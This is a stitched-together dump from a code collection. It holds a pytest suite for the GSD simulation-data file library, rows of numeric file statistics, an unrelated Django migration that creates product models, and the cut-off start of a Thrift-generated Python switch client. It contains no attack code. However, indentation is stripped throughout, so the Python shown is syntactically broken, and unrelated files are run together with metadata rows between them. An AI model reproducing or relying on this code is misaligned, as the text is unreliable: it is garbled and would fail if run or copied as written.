# This file is part of the General Simulation Data (GSD) project, released under
# the BSD 2-Clause License.
"""Test gsd.fl."""
import gsd.fl
import gsd.pygsd
import numpy
import platform
import pytest
import random
import pathlib
import os
import shutil
test_path = pathlib.Path(os.path.realpath(__file__)).parent
def test_create(tmp_path):
"""Test creation of GSD files."""
gsd.fl.open(mode='xb',
name=tmp_path / "test_create.gsd",
application="test_create",
schema="none",
schema_version=[1, 2])
@pytest.mark.parametrize('typ', [
numpy.uint8,
numpy.uint16,
numpy.uint32,
numpy.uint64,
numpy.int8,
numpy.int16,
numpy.int32,
numpy.int64,
numpy.float32,
numpy.float64,
])
def test_dtype(tmp_path, typ):
"""Test all supported data types."""
data1d = numpy.array([1, 2, 3, 4, 5, 10012], dtype=typ)
data2d = numpy.array([[10, 20], [30, 40], [50, 80]], dtype=typ)
data_zero = numpy.array([], dtype=typ)
gsd.fl.open(mode='xb',
name=tmp_path / "test_dtype.gsd",
application="test_dtype",
schema="none",
schema_version=[1, 2])
with gsd.fl.open(name=tmp_path / "test_dtype.gsd",
mode='wb',
application="test_dtype",
schema="none",
schema_version=[1, 2]) as f:
f.write_chunk(name='data1d', data=data1d)
f.write_chunk(name='data2d', data=data2d)
f.write_chunk(name='data_zero', data=data_zero)
f.end_frame()
with gsd.fl.open(name=tmp_path / "test_dtype.gsd",
mode='rb',
application="test_dtype",
schema="none",
schema_version=[1, 2]) as f:
read_data1d = f.read_chunk(frame=0, name='data1d')
read_data2d = f.read_chunk(frame=0, name='data2d')
read_data_zero = f.read_chunk(frame=0, name='data_zero')
assert data1d.dtype == read_data1d.dtype
numpy.testing.assert_array_equal(data1d, read_data1d)
assert data2d.dtype == read_data2d.dtype
numpy.testing.assert_array_equal(data2d, read_data2d)
assert data_zero.dtype == read_data_zero.dtype
assert data_zero.shape == (0,)
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / "test_dtype.gsd"), mode='rb')) as f:
read_data1d = f.read_chunk(frame=0, name='data1d')
read_data2d = f.read_chunk(frame=0, name='data2d')
assert data1d.dtype == read_data1d.dtype
numpy.testing.assert_array_equal(data1d, read_data1d)
assert data2d.dtype == read_data2d.dtype
numpy.testing.assert_array_equal(data2d, read_data2d)
def test_metadata(tmp_path, open_mode):
"""Test file metadata."""
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
with gsd.fl.open(name=tmp_path / 'test_metadata.gsd',
mode=open_mode.write,
application='test_metadata',
schema='none',
schema_version=[1, 2]) as f:
assert f.mode == open_mode.write
for i in range(150):
f.write_chunk(name='data', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_metadata.gsd',
mode=open_mode.read,
application='test_metadata',
schema='none',
schema_version=[1, 2]) as f:
assert f.name == str(tmp_path / 'test_metadata.gsd')
assert f.mode == open_mode.read
assert f.application == 'test_metadata'
assert f.schema == 'none'
assert f.schema_version == (1, 2)
assert f.nframes == 150
assert f.gsd_version == (2, 0)
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_metadata.gsd'), mode='rb')) as f:
assert f.name == str(tmp_path / 'test_metadata.gsd')
assert f.mode == 'rb'
assert f.application == 'test_metadata'
assert f.schema == 'none'
assert f.schema_version == (1, 2)
assert f.nframes == 150
assert f.gsd_version == (2, 0)
def test_append(tmp_path, open_mode):
"""Test that data chunks can be appended to existing files."""
with gsd.fl.open(name=tmp_path / 'test_append.gsd',
mode=open_mode.write,
application='test_append',
schema='none',
schema_version=[1, 2]):
pass
data = numpy.array([10], dtype=numpy.int64)
nframes = 1024
with gsd.fl.open(name=tmp_path / 'test_append.gsd',
mode='ab',
application='test_append',
schema='none',
schema_version=[1, 2]) as f:
assert f.mode == 'ab'
for i in range(nframes):
data[0] = i
f.write_chunk(name='data1', data=data)
data[0] = i * 10
f.write_chunk(name='data10', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_append.gsd',
mode=open_mode.read,
application='test_append',
schema='none',
schema_version=[1, 2]) as f:
assert f.nframes == nframes
for i in range(nframes):
data1 = f.read_chunk(frame=i, name='data1')
data10 = f.read_chunk(frame=i, name='data10')
assert data1[0] == i
assert data10[0] == i * 10
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path
/ 'test_append.gsd'), mode=open_mode.read)) as f:
assert f.nframes == nframes
for i in range(nframes):
data1 = f.read_chunk(frame=i, name='data1')
data10 = f.read_chunk(frame=i, name='data10')
assert data1[0] == i
assert data10[0] == i * 10
def test_chunk_exists(tmp_path, open_mode):
"""Test the chunk_exists API."""
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
with gsd.fl.open(name=tmp_path / 'test_chunk_exists.gsd',
mode=open_mode.write,
application='test_chunk_exists',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
f.write_chunk(name='abcdefg', data=data)
f.end_frame()
f.write_chunk(name='test', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_chunk_exists.gsd',
mode=open_mode.read,
application='test_chunk_exists',
schema='none',
schema_version=[1, 2]) as f:
assert f.chunk_exists(frame=0, name='chunk1')
read_data = f.read_chunk(frame=0, name='chunk1')
assert f.chunk_exists(frame=1, name='abcdefg')
read_data = f.read_chunk(frame=1, name='abcdefg')
assert f.chunk_exists(frame=2, name='test')
read_data = f.read_chunk(frame=2, name='test')
assert not f.chunk_exists(frame=1, name='chunk1')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=1, name='chunk1')
assert not f.chunk_exists(frame=2, name='abcdefg')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=2, name='abcdefg')
assert not f.chunk_exists(frame=0, name='test')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=0, name='test')
assert not f.chunk_exists(frame=2, name='chunk1')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=2, name='chunk1')
assert not f.chunk_exists(frame=0, name='abcdefg')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=0, name='abcdefg')
assert not f.chunk_exists(frame=1, name='test')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=1, name='test')
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_chunk_exists.gsd'), mode='rb')) as f:
assert f.chunk_exists(frame=0, name='chunk1')
read_data = f.read_chunk(frame=0, name='chunk1')
assert f.chunk_exists(frame=1, name='abcdefg')
read_data = f.read_chunk(frame=1, name='abcdefg')
assert f.chunk_exists(frame=2, name='test')
read_data = f.read_chunk(frame=2, name='test')
assert not f.chunk_exists(frame=1, name='chunk1')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=1, name='chunk1')
assert not f.chunk_exists(frame=2, name='abcdefg')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=2, name='abcdefg')
assert not f.chunk_exists(frame=0, name='test')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=0, name='test')
assert not f.chunk_exists(frame=2, name='chunk1')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=2, name='chunk1')
assert not f.chunk_exists(frame=0, name='abcdefg')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=0, name='abcdefg')
assert not f.chunk_exists(frame=1, name='test')
with pytest.raises(Exception):
read_data = f.read_chunk(frame=1, name='test') # noqa
def test_readonly_errors(tmp_path, open_mode):
"""Test that read only files provide the appropriate errors."""
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
with gsd.fl.open(name=tmp_path / 'test_readonly_errors.gsd',
mode=open_mode.write,
application='test_readonly_errors',
schema='none',
schema_version=[1, 2]) as f:
for i in range(10):
f.write_chunk(name='chunk1', data=data)
f.end_frame()
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
with gsd.fl.open(name=tmp_path / 'test_readonly_errors.gsd',
mode='rb',
application='test_readonly_errors',
schema='none',
schema_version=[1, 2]) as f:
with pytest.raises(Exception):
f.end_frame()
with pytest.raises(Exception):
f.write_chunk(name='chunk1', data=data)
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path
/ 'test_readonly_errors.gsd'), mode='rb')) as f:
with pytest.raises(Exception):
f.end_frame()
with pytest.raises(Exception):
f.write_chunk(name='chunk1', data=data)
def test_fileio_errors(tmp_path, open_mode):
"""Test that OS file I/O errors pass through."""
# These test cause python to crash on windows....
if platform.system() != "Windows":
with pytest.raises(Exception):
gsd.fl.open(name='/this/file/does/not/exist',
application='test_readonly_errors',
schema='none',
schema_version=[1, 2])
with open(str(tmp_path / 'test_fileio_errors.gsd'),
open_mode.write) as f:
f.write(b'test')
with pytest.raises(RuntimeError):
f = gsd.fl.open(name=tmp_path / 'test_fileio_errors.gsd',
mode=open_mode.read,
application='test_readonly_errors',
schema='none',
schema_version=[1, 2])
def test_dtype_errors(tmp_path, open_mode):
"""Test that unsupported data types result in errors."""
with pytest.raises(Exception):
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.bool_)
with gsd.fl.open(name=tmp_path / 'test_dtype_errors.gsd',
mode=open_mode.write,
application='test_dtype_errors',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with pytest.raises(Exception):
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.float16)
with gsd.fl.open(name=tmp_path / 'test_dtype_errors.gsd',
mode=open_mode.write,
application='test_dtype_errors',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with pytest.raises(Exception):
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.complex64)
with gsd.fl.open(name=tmp_path / 'test_dtype_errors.gsd',
mode=open_mode.write,
application='test_dtype_errors',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with pytest.raises(Exception):
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.complex128)
with gsd.fl.open(name=tmp_path / 'test_dtype_errors.gsd',
mode=open_mode.write,
application='test_dtype_errors',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
def test_truncate(tmp_path):
"""Test that the truncate method functions."""
data = numpy.ascontiguousarray(numpy.random.random(size=(1000, 3)),
dtype=numpy.float32)
with gsd.fl.open(name=tmp_path / 'test_truncate.gsd',
mode='wb',
application='test_truncate',
schema='none',
schema_version=[1, 2]) as f:
assert f.mode == 'wb'
for i in range(10):
f.write_chunk(name='data', data=data)
f.end_frame()
assert f.nframes == 10
f.truncate()
assert f.nframes == 0
assert f.application == 'test_truncate'
assert f.schema == 'none'
assert f.schema_version == (1, 2)
f.write_chunk(name='data', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_truncate.gsd',
mode='rb',
application='test_truncate',
schema='none',
schema_version=[1, 2]) as f:
assert f.name == str(tmp_path / 'test_truncate.gsd')
assert f.mode == 'rb'
assert f.application == 'test_truncate'
assert f.schema == 'none'
assert f.schema_version == (1, 2)
assert f.nframes == 1
def test_namelen(tmp_path, open_mode):
"""Test that long names are truncated as documented."""
app_long = 'abcdefga' * 100
schema_long = 'ijklmnop' * 100
chunk_long = '12345678' * 100
with gsd.fl.open(name=tmp_path / 'test_namelen.gsd',
mode=open_mode.write,
application=app_long,
schema=schema_long,
schema_version=[1, 2]) as f:
assert f.application == app_long[0:63]
assert f.schema == schema_long[0:63]
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
f.write_chunk(name=chunk_long, data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_namelen.gsd',
mode=open_mode.read,
application=app_long,
schema=schema_long,
schema_version=[1, 2]) as f:
data_read = f.read_chunk(0, name=chunk_long)
numpy.testing.assert_array_equal(data, data_read)
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_namelen.gsd'), mode='rb')) as f:
data_read = f.read_chunk(0, name=chunk_long)
numpy.testing.assert_array_equal(data, data_read)
def test_open(tmp_path):
"""Test the open() API."""
data = numpy.array([1, 2, 3, 4, 5, 10012], dtype=numpy.int64)
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='xb',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_2.gsd',
mode='xb+',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
f.read_chunk(0, name='chunk1')
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='wb',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='wb+',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
f.read_chunk(0, name='chunk1')
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='ab',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='rb',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.read_chunk(0, name='chunk1')
f.read_chunk(1, name='chunk1')
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode='rb+',
application='test_open',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='chunk1', data=data)
f.end_frame()
f.read_chunk(0, name='chunk1')
f.read_chunk(1, name='chunk1')
f.read_chunk(2, name='chunk1')
def test_find_matching_chunk_names(tmp_path, open_mode):
"""Test the find_matching_chunk_names API."""
data = numpy.array([1, 2, 3, 4, 5], dtype=numpy.float32)
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode=open_mode.write,
application='test_find_matching_chunk_names',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='log/A', data=data)
f.write_chunk(name='log/chunk2', data=data)
f.end_frame()
f.write_chunk(name='data/B', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode=open_mode.read,
application='test_find_matching_chunk_names',
schema='none',
schema_version=[1, 2]) as f:
all_chunks = f.find_matching_chunk_names('')
assert len(all_chunks) == 3
assert 'log/A' in all_chunks
assert 'log/chunk2' in all_chunks
assert 'data/B' in all_chunks
log_chunks = f.find_matching_chunk_names('log/')
assert len(log_chunks) == 2
assert 'log/A' in log_chunks
assert 'log/chunk2' in log_chunks
data_chunks = f.find_matching_chunk_names('data/')
assert len(data_chunks) == 1
assert 'data/B' in data_chunks
other_chunks = f.find_matching_chunk_names('other/')
assert len(other_chunks) == 0
# test again with pygsd
with gsd.pygsd.GSDFile(file=open(str(tmp_path
/ "test.gsd"), mode='rb')) as f:
all_chunks = f.find_matching_chunk_names('')
assert len(all_chunks) == 3
assert 'log/A' in all_chunks
assert 'log/chunk2' in all_chunks
assert 'data/B' in all_chunks
log_chunks = f.find_matching_chunk_names('log/')
assert len(log_chunks) == 2
assert 'log/A' in log_chunks
assert 'log/chunk2' in log_chunks
data_chunks = f.find_matching_chunk_names('data/')
assert len(data_chunks) == 1
assert 'data/B' in data_chunks
other_chunks = f.find_matching_chunk_names('other/')
assert len(other_chunks) == 0
def test_chunk_name_limit(tmp_path, open_mode):
"""Test that providing more than the maximum allowed chunk names errors."""
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode=open_mode.write,
application='test_chunk_name_limit',
schema='none',
schema_version=[1, 2]) as f:
for i in range(65535):
f.write_chunk(name=str(i), data=numpy.array([i], dtype=numpy.int32))
# The GSD specification limits to 65535 names:
with pytest.raises(RuntimeError):
f.write_chunk(name='65536',
data=numpy.array([i], dtype=numpy.int32))
def test_many_names(tmp_path, open_mode):
"""Test that many chunk names can be written to a file."""
values = list(range(1000))
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode=open_mode.write,
application='test_many_names',
schema='none',
schema_version=[1, 2]) as f:
for frame in range(5):
random.shuffle(values)
for value in values:
f.write_chunk(name=str(value),
data=numpy.array([value * 13], dtype=numpy.int32))
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test.gsd',
mode=open_mode.read,
application='test_many_names',
schema='none',
schema_version=[1, 2]) as f:
for frame in range(5):
random.shuffle(values)
for value in values:
data = numpy.array([value * 13], dtype=numpy.int32)
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
with gsd.pygsd.GSDFile(file=open(str(tmp_path
/ 'test.gsd'), mode='rb')) as f:
for frame in range(5):
random.shuffle(values)
for value in values:
data = numpy.array([value * 13], dtype=numpy.int32)
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
def test_gsd_v1_read():
"""Test that the GSD v2 API can read v1 files."""
values = list(range(127))
values_str = [str(v) for v in values]
values_str.sort()
# test that we can:
# 1) Read chunk values correctly
# 2) Iterate through chunk names correctly
def check_v1_file_read(f):
assert f.gsd_version == (1, 0)
for frame in range(5):
random.shuffle(values)
for value in values:
data = numpy.array([value * 13], dtype=numpy.int32)
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
chunk_names = f.find_matching_chunk_names('')
chunk_names.sort()
assert chunk_names == values_str
# test with the C implemantation
with gsd.fl.open(name=test_path / 'test_gsd_v1.gsd',
mode='rb',
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
check_v1_file_read(f)
# and the pure python implementation
with gsd.pygsd.GSDFile(
file=open(str(test_path / 'test_gsd_v1.gsd'), mode='rb')) as f:
assert f.gsd_version == (1, 0)
check_v1_file_read(f)
def test_gsd_v1_upgrade_read(tmp_path, open_mode):
"""Test that v1 files can be upgraded to v2."""
values = list(range(127))
values_str = [str(v) for v in values]
values_str.sort()
# test that we can:
# 1) Read chunk values correctly
# 2) Iterate through chunk names correctly
def check_v1_file_read(f):
for frame in range(5):
random.shuffle(values)
for value in values:
data = numpy.array([value * 13], dtype=numpy.int32)
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
chunk_names = f.find_matching_chunk_names('')
chunk_names.sort()
assert chunk_names == values_str
shutil.copy(test_path / 'test_gsd_v1.gsd', tmp_path / 'test_gsd_v1.gsd')
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode='rb+',
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
assert f.gsd_version == (1, 0)
f.upgrade()
# check that we can read the file contents after the upgrade in memory
check_v1_file_read(f)
# and the same tests again after closing and opening the file
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode=open_mode.read,
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
assert f.gsd_version == (2, 0)
check_v1_file_read(f)
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_gsd_v1.gsd'), mode='rb')) as f:
assert f.gsd_version == (2, 0)
check_v1_file_read(f)
def test_gsd_v1_write(tmp_path, open_mode):
"""Test that v2 can write to v1 files."""
values = list(range(256))
# include a very long chunk name to check that the name is truncated
# properly for the v1 format limitations
long_name = 'abcdefg' * 1000
values.append(long_name)
values_str = []
for v in values:
if type(v) == str and len(v) > 63:
# v1 files truncate names to 63 chars
v = v[0:63]
values_str.append(str(v))
values_str.sort()
shutil.copy(test_path / 'test_gsd_v1.gsd', tmp_path / 'test_gsd_v1.gsd')
# test that we can:
# 1) Read chunk values correctly
# 2) Iterate through chunk names correctly
def check_v1_file_read(f):
assert f.gsd_version == (1, 0)
chunk_names = f.find_matching_chunk_names('')
chunk_names.sort()
assert chunk_names == values_str
frame = 5
random.shuffle(values)
for value in values:
if type(value) == int:
data = numpy.array([value * 13], dtype=numpy.int32)
else:
data = numpy.array([hash(value)], dtype=numpy.int64)
# v1 files truncate names to 63 chars
if len(value) > 63:
value = value[0:63]
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
# test that we can write new entries to the file
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode='rb+',
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
assert f.gsd_version == (1, 0)
for value in values:
if type(value) == int:
data = numpy.array([value * 13], dtype=numpy.int32)
else:
data = numpy.array([hash(value)], dtype=numpy.int64)
f.write_chunk(name=str(value), data=data)
f.end_frame()
check_v1_file_read(f)
# test opening again with the C implemantation
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode=open_mode.read,
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
check_v1_file_read(f)
# and the pure python implementation
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_gsd_v1.gsd'), mode='rb')) as f:
assert f.gsd_version == (1, 0)
check_v1_file_read(f)
def test_gsd_v1_upgrade_write(tmp_path, open_mode):
"""Test that upgraded files can be written to after upgraded."""
values = list(range(256))
# include a very long chunk name to check that the name can be written
# after the upgrade
long_name = 'abcdefg' * 1000
values.append(long_name)
values_str = [str(v) for v in values]
values_str.sort()
shutil.copy(test_path / 'test_gsd_v1.gsd', tmp_path / 'test_gsd_v1.gsd')
# test that we can:
# 1) Read chunk values correctly
# 2) Iterate through chunk names correctly
def check_v1_file_read(f):
chunk_names = f.find_matching_chunk_names('')
chunk_names.sort()
assert chunk_names == values_str
frame = 5
random.shuffle(values)
for value in values:
if type(value) == int:
data = numpy.array([value * 13], dtype=numpy.int32)
else:
data = numpy.array([hash(value)], dtype=numpy.int64)
data_read = f.read_chunk(frame=frame, name=str(value))
numpy.testing.assert_array_equal(data, data_read)
# test that we can write new entries to the file
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode='rb+',
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
assert f.gsd_version == (1, 0)
f.upgrade()
assert f.gsd_version == (2, 0)
for value in values:
if type(value) == int:
data = numpy.array([value * 13], dtype=numpy.int32)
else:
data = numpy.array([hash(value)], dtype=numpy.int64)
f.write_chunk(name=str(value), data=data)
f.end_frame()
check_v1_file_read(f)
# test opening again with the C implemantation
with gsd.fl.open(name=tmp_path / 'test_gsd_v1.gsd',
mode=open_mode.read,
application='test_gsd_v1',
schema='none',
schema_version=[1, 2]) as f:
assert f.gsd_version == (2, 0)
check_v1_file_read(f)
# and the pure python implementation
with gsd.pygsd.GSDFile(
file=open(str(tmp_path / 'test_gsd_v1.gsd'), mode='rb')) as f:
assert f.gsd_version == (2, 0)
check_v1_file_read(f)
def test_zero_size(tmp_path, open_mode):
"""Test that zero-size data chunks are allowed."""
data = numpy.array([], dtype=numpy.float32)
with gsd.fl.open(name=tmp_path / 'test_zero.gsd',
mode=open_mode.write,
application='test_zero',
schema='none',
schema_version=[1, 2]) as f:
f.write_chunk(name='data', data=data)
f.end_frame()
with gsd.fl.open(name=tmp_path / 'test_zero.gsd',
mode=open_mode.read,
application='test_zero',
schema='none',
schema_version=[1, 2]) as f:
assert f.nframes == 1
data_read = f.read_chunk(frame=0, name='data')
assert data_read.shape == (0,)
assert data_read.dtype == numpy.float32
# test again with pygsd
with gsd.pygsd.GSDFile(
file=open(str(tmp_path
/ 'test_zero.gsd'), mode=open_mode.read)) as f:
assert f.nframes == 1
data_read = f.read_chunk(frame=0, name='data')
assert data_read.shape == (0,)
assert data_read.dtype == numpy.float32
| 36.344519
| 80
| 0.554813
| 4,231
| 32,492
| 4.082486
| 0.05507
| 0.032015
| 0.040757
| 0.041684
| 0.866497
| 0.851329
| 0.833266
| 0.806635
| 0.800903
| 0.779714
| 0
| 0.031695
| 0.325126
| 32,492
| 893
| 81
| 36.385218
| 0.75602
| 0.072264
| 0
| 0.812779
| 0
| 0
| 0.084728
| 0.012299
| 0
| 0
| 0
| 0
| 0.169391
| 1
| 0.034175
| false
| 0.001486
| 0.013373
| 0
| 0.047548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5bea47e3ac02072464e6013f83e0960d9dcd6df
| 3,184
|
py
|
Python
|
my_app/blog/migrations/0029_latestproduct_latestproductone_reviewproduct_reviewproductone_topproduct_topproductone.py
|
Faisal-Sey/official1
|
49af7a9fd60c980bd5d4ef7075a4c1f27ecc9642
|
[
"MIT"
] | 1
|
2021-06-19T00:17:02.000Z
|
2021-06-19T00:17:02.000Z
|
my_app/blog/migrations/0029_latestproduct_latestproductone_reviewproduct_reviewproductone_topproduct_topproductone.py
|
Faisal-Sey/official1
|
49af7a9fd60c980bd5d4ef7075a4c1f27ecc9642
|
[
"MIT"
] | null | null | null |
my_app/blog/migrations/0029_latestproduct_latestproductone_reviewproduct_reviewproductone_topproduct_topproductone.py
|
Faisal-Sey/official1
|
49af7a9fd60c980bd5d4ef7075a4c1f27ecc9642
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1 on 2020-09-17 09:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0028_delete_search'),
]
operations = [
migrations.CreateModel(
name='LatestProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
migrations.CreateModel(
name='LatestProductOne',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
migrations.CreateModel(
name='ReviewProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
migrations.CreateModel(
name='ReviewProductOne',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
migrations.CreateModel(
name='TopProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
migrations.CreateModel(
name='TopProductOne',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
]
| 43.027027
| 114
| 0.551193
| 297
| 3,184
| 5.740741
| 0.191919
| 0.095015
| 0.087977
| 0.080938
| 0.854545
| 0.854545
| 0.854545
| 0.854545
| 0.854545
| 0.854545
| 0
| 0.029676
| 0.301508
| 3,184
| 73
| 115
| 43.616438
| 0.73696
| 0.013505
| 0
| 0.80597
| 1
| 0
| 0.099713
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014925
| 0
| 0.059701
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
913d643d59688620838cc48a10903e3717d70381
| 13,039
|
py
|
Python
|
targets/simple_linker/lswitch_runtime/LinkerSwitch.py
|
hksoni/p4bricks
|
0b2f4a1cbfe94d8cbbe7e04716c1b418f5f73204
|
[
"Apache-2.0"
] | 1
|
2021-02-18T15:43:04.000Z
|
2021-02-18T15:43:04.000Z
|
targets/simple_linker/lswitch_runtime/LinkerSwitch.py
|
hksoni/p4bricks
|
0b2f4a1cbfe94d8cbbe7e04716c1b418f5f73204
|
[
"Apache-2.0"
] | null | null | null |
targets/simple_linker/lswitch_runtime/LinkerSwitch.py
|
hksoni/p4bricks
|
0b2f4a1cbfe94d8cbbe7e04716c1b418f5f73204
|
[
"Apache-2.0"
] | null | null | null |
#
# Autogenerated by Thrift Compiler (0.9.2)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def p4_program_config_add(self, program_name, config_str):
"""
Parameters:
- program_name
- config_str
"""
pass
def p4_program_config_delete(self, program_name):
"""
Parameters:
- program_name
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def p4_program_config_add(self, program_name, config_str):
"""
Parameters:
- program_name
- config_str
"""
self.send_p4_program_config_add(program_name, config_str)
return self.recv_p4_program_config_add()
def send_p4_program_config_add(self, program_name, config_str):
self._oprot.writeMessageBegin('p4_program_config_add', TMessageType.CALL, self._seqid)
args = p4_program_config_add_args()
args.program_name = program_name
args.config_str = config_str
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
